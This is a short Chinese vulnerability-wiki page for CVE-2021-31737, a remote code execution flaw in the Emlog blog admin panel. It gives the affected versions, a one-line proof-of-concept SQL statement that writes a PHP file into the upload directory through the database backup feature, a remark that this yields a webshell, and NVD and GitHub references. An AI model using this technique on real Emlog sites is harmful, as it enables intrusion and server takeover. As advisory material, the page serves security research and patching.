menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Vulnerability-棱角社区(Vulnerability)项目漏洞-20210715 chevron_right Emlog v5.3.1 - v6.0.0 后台 RCE(CVE-2021-31737).md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Emlog v5.3.1 - v6.0.0 后台 RCE(CVE-2021-31737).md
    556 B / 2021-05-21 09:14:38
        # Emlog v5.3.1 - v6.0.0 后台 RCE(CVE-2021-31737)

由于在admin/data.php中上传了数据库备份文件,因此emlog v5.3.1和emlog v6.0.0具有远程执行代码漏洞。

影响版本:

* Emlog v5.3.1
* Emlog v6.0.0

PoC:

```
select "<?php phpinfo();?>" into outfile "/var/www/html/tet1/emlog_6.0.0/src/content/uploadfile/202104/222.php";

```

通过在后台数据-备份数据库进行构造恶意sql语句进行备份上传-getshell

ref:

* https://nvd.nist.gov/vuln/detail/CVE-2021-31737
* https://github.com/emlog/emlog/issues/82
    links
    file_download